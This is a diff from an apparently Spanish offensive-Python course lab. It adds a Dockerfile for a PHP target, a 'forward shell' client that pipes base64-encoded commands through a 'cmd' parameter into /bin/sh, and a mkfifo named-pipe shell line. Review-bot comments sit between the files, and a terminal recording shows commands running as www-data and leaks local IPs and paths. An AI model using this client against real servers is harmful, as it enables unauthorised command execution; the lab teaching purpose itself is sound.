diff --git a/python-ofensivo/15_hacking/12_fs/Dockerfile b/python-ofensivo/15_hacking/12_fs/Dockerfile
new file mode 100644
index 0000000..9840189
--- /dev/null
+++ b/python-ofensivo/15_hacking/12_fs/Dockerfile
@@ -0,0 +1,5 @@
+FROM php:7.0-apache
+
+COPY index.php /var/www/html/
+
+EXPOSE 80
diff --git a/python-ofensivo/15_hacking/12_fs/index.php b/python-ofensivo/15_hacking/12_fs/index.php
new file mode 100644
index 0000000..7f2c9e7
--- /dev/null
+++ b/python-ofensivo/15_hacking/12_fs/index.php
@@ -0,0 +1,5 @@
+
\ No newline at end of file
diff --git a/python-ofensivo/15_hacking/12_fs/script/forwardshell.py b/python-ofensivo/15_hacking/12_fs/script/forwardshell.py
new file mode 100644
index 0000000..3c6725d
--- /dev/null
+++ b/python-ofensivo/15_hacking/12_fs/script/forwardshell.py
@@ -0,0 +1,51 @@
+#!/usr/bin/env python3
+"""
+
+Forward Shell
+
+Comandos para reverse shell:
+https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+
+mkfifo input; tail -f input | /bin/sh 2>&1 > output
+
+"""
+
+import requests
+import signal
+import sys
+
+from termcolor import colored
+from base64 import b64encode
+
+def def_handler(sig, frame):
+
+ print(colored("\n[!] Exiting...", "blue"))
+ sys.exit(1)
+
+
+signal.signal(signal.SIGINT, def_handler)
+
+main_url = "http://localhost/index.php"
+
+
+def run_command(command):
+
+ command = b64encode(command.encode()).decode()
+
+ data = {
+ 'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
+ }
+
+ r = requests.get(main_url, params=data)
+
+ return r.text
+
+
+if __name__ == '__main__':
+
+ while True:
+
+ command = input(colored("> ", "yellow"))
+ output_command = run_command(command)
+
+ print(output_command)
diff --git a/python-ofensivo/15_hacking/12_fs/typescript b/python-ofensivo/15_hacking/12_fs/typescript
new file mode 100644
index 0000000..0e9db4f
--- /dev/null
+++ b/python-ofensivo/15_hacking/12_fs/typescript
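Review bot: Nothing in this Dockerfile marks the image as a deliberately vulnerable lab target, yet it serves `index.php` on port 80. Judging by the client script added in the same commit, that page presumably executes the `cmd` query parameter, though its body is not visible in this view. A header comment such as `# LAB ONLY: intentionally vulnerable; publish on loopback, e.g. docker run -p 127.0.0.1:80:80 <image>` would make the intended exposure explicit. The `php:7.0-apache` base is also a release line that no longer receives upstream fixes (the recorded session shows PHP 7.0.33 built in December 2018), which is fine for a throwaway target but worth stating in the same comment.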
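Review bot: `requests.get(main_url, params=data)` in `run_command` has no `timeout`, so a server-side command that never returns blocks the prompt indefinitely. The session recorded later in this commit shows this, with the request stuck in `recv_into` until Ctrl-C. Passing a bound, for example `r = requests.get(main_url, params=data, timeout=10)` (value constructed), and catching `requests.exceptions.Timeout` around the call would keep the loop usable. The module docstring would also benefit from stating that `main_url` is meant to stay on the local lab container built by this commit's Dockerfile. It could add that every command reaches the server as a URL-encoded `cmd` query string piped through `base64 -d` into `/bin/sh`, which a default access log records and which is the pattern a defender would search for.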
@@ -0,0 +1,169 @@ +Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"] +  + +7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04 +❯ [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%   +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕️ main ?1  🔒 ES at ⚡ 18:20:04 +❯ [?1h=[?25h[?2004h[?25l  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕️ main ?1  🔒 ES vpn at ⚡ 18:20:04 +❯ 🏠 192.168.1.115[?25h[?25l  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕️ main ?1  🔒 ES vpn at ⚡ 18:20:04 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l ❯ script/[?25h +]2;script/]1;script/% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:20:09 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l ❯ #!/usr/bin/env python3[?25h +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:20:30 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat 
rdshell.py[?1l>[?25l[?2004l ❯ code forwardshell.py[?25h +]2;code forwardshell.py]1;code% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:20:44 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;pywww-data + +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:23:42 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;py> cat + +/ +^CTraceback (most recent call last): + File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in + output_command = run_command(command) + File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command + r = requests.get(main_url, params=data) + File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get + return request("get", url, params=params, **kwargs) + File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request + return session.request(method=method, url=url, **kwargs) + File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request + resp = 
self.send(prep, **send_kwargs) + File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send + r = adapter.send(request, **kwargs) + File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send + resp = conn.urlopen( + File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen + httplib_response = self._make_request( + File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request + six.raise_from(e, None) + File "", line 3, in raise_from + File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request + httplib_response = conn.getresponse() + File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse + response.begin() + File "/usr/lib/python3.10/http/client.py", line 318, in begin + version, status, reason = self._read_status() + File "/usr/lib/python3.10/http/client.py", line 279, in _read_status + line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1") + File "/usr/lib/python3.10/socket.py", line 705, in readinto + return self._sock.recv_into(b) +KeyboardInterrupt + +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕️ main ?1 +❯ 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;py> whoami +www-data + +> cat /etc/hosts +127.0.0.1 localhost +::1 localhost ip6-localhost ip6-loopback +fe00::0 ip6-localnet +ff00::0 ip6-mcastprefix +ff02::1 ip6-allnodes +ff02::2 ip6-allrouters +172.17.0.2 2f2f81768a05 + +> pwd +/var/www/html + +> ^C +[!] Exiting... 
+% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09 +❯ 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;py> exit + +> exit + +> ^C +[!] Exiting... +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;py> exit + +> exit + +> ^C +[!] Exiting... +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l ❯ py forwardshell.py[?25h +]2;python3 forwardshell.py]1;py> exit + +> ls +index.php + +> e ^C +[!] Exiting... 
+% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:36 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hppy forwardshell.pyph                php --interactive[?1l>[?25l[?2004l ❯ php --interactive[?25h +]2;php --interactive]1;phpzsh: command not found: php +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:36:56 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hdd exec -it 2f2 bashdo                 cker portdocckkedocker e   xec -it 0fc1 shxec -it 0fc1 sh[?1l>[?25l[?2004l ❯ docker exec -it 0fc1 sh[?25h +]2;docker exec -it 0fc1 sh]1;dockerError response from daemon: No such container: 0fc1 +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:37:09 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hddocker exec -it 0fc1 shd                      exec -it 2f2 bashexec -it 2f2 bash[?1l>[?25l[?2004l ❯ d exec -it 2f2 bash[?25h +]2;docker exec -it 2f2 bash]1;droot@2f2f81768a05:/var/www/html# php --version +PHP 7.0.33 (cli) (built: Dec 29 2018 06:50:58) ( NTS ) +Copyright (c) 1997-2017 The PHP Group +Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies +root@2f2f81768a05:/var/www/html# php --interactive +Interactive 
shell + +php > exit +root@2f2f81768a05:/var/www/html# e exit +exit +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1 took 1m 55s 🔒 ES vpn at ⚡ 18:39:09 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir scriptmkmkddimkdir c     atch-all/01_scripts_descifrador_wargame.pyi                                         bnc    atch-all/01_scripts_descifrador_wargame.pyo                                         mandos-peladon            cepto[?1l>[?25l[?2004l ❯ mkdir concepto[?25h +]2;mkdir concepto]1;mkdir% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:39:33 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hllsls[?1l>[?25l[?2004l ❯ ls[?25h +]2;ls --color=tty]1;lsconcepto forwardshell.py +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\  +🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕️ main ?1  🔒 ES vpn at ⚡ 18:39:33 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hccode forwardshell.pycocon                 catenadas="hola $kease"ncce                     epconcepto/o [?1l>[?25l[?2004l ❯ concepto[?25h +]2;concepto]1;concepto% 
]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕️ main ?1  🔒 ES vpn at ⚡ 18:39:36 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir conceptomkmkf           ifo --helpfiifmkfifo i     npyt;    ut;t  ttaaitail -f inop  put | //bbi/binn//bin/s/bin/sh 22>>&1 Z > ouputtput[?1l>[?25l[?2004l ❯ mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h +]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifo^C +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕️ main ?1 х INT took 7m 34s 🔒 ES vpn at ⚡ 18:48:03 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcconceptoca      t ../09_keylogger/.env | pbcopycat o                            utput.pcap | wc -louutput              [?1l>[?25l[?2004l ❯ cat output[?25h +]2;cat output]1;catv +/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto +/home/v +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕️ main ?1  🔒 ES vpn at ⚡ 18:48:11 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcat outputls       cat outputecho "whoami" > inputcat output         ls       cat outputecho "pwd" > inputcat output       ls       cat outputecho "whoami" > inputcat 
output         ls       cat outputls       cat output         mmkfifo input; tail -f input | /bin/sh 2>&1 > outputmkmkd                                                ir conceptomk            fifo input; tail -f input | /bin/sh 2>&1 > outputmkfmkfifo input; tail -f input | /bin/sh 2>&1 > output[?1l>[?25l[?2004l ❯ mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h +]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifomkfifo: no s’ha pogut crear la cua FIFO 'input': El fitxer ja existeix +/bin/sh: 5: probando: not found +^C +Session terminated, killing shell... +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\  +🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕️ main ?1 х INT took 4m 51s 🔒 ES vpn at ⚡ 18:53:13 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h ...killed. +[?25l ❯ [?25h[?2004l +% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\  +🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38 +❯ 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h  +🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38 +❯ 🏠 192.168.1.112 📡 192.145.39.54eecho "whoami" > inputex                   itexiexit[?1l>[?25l[?2004l ❯ exit[?25h +]2;exit]1;exit +Script done on 2024-02-02 23:00:00+01:00 [COMMAND_EXIT_CODE="130"]
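Review bot: This file is a `script(1)` terminal recording and looks like an accidental commit; it should be dropped from the change and `typescript` added to `.gitignore`. Besides escape-sequence noise, the capture exposes the workstation's user and host name, absolute home-directory paths, the LAN and public addresses printed by the prompt, and history autosuggestions for unrelated commands, one of which reads a `.env` file. Deleting it in a follow-up commit would still leave it in history, so if the repository is public the history needs rewriting.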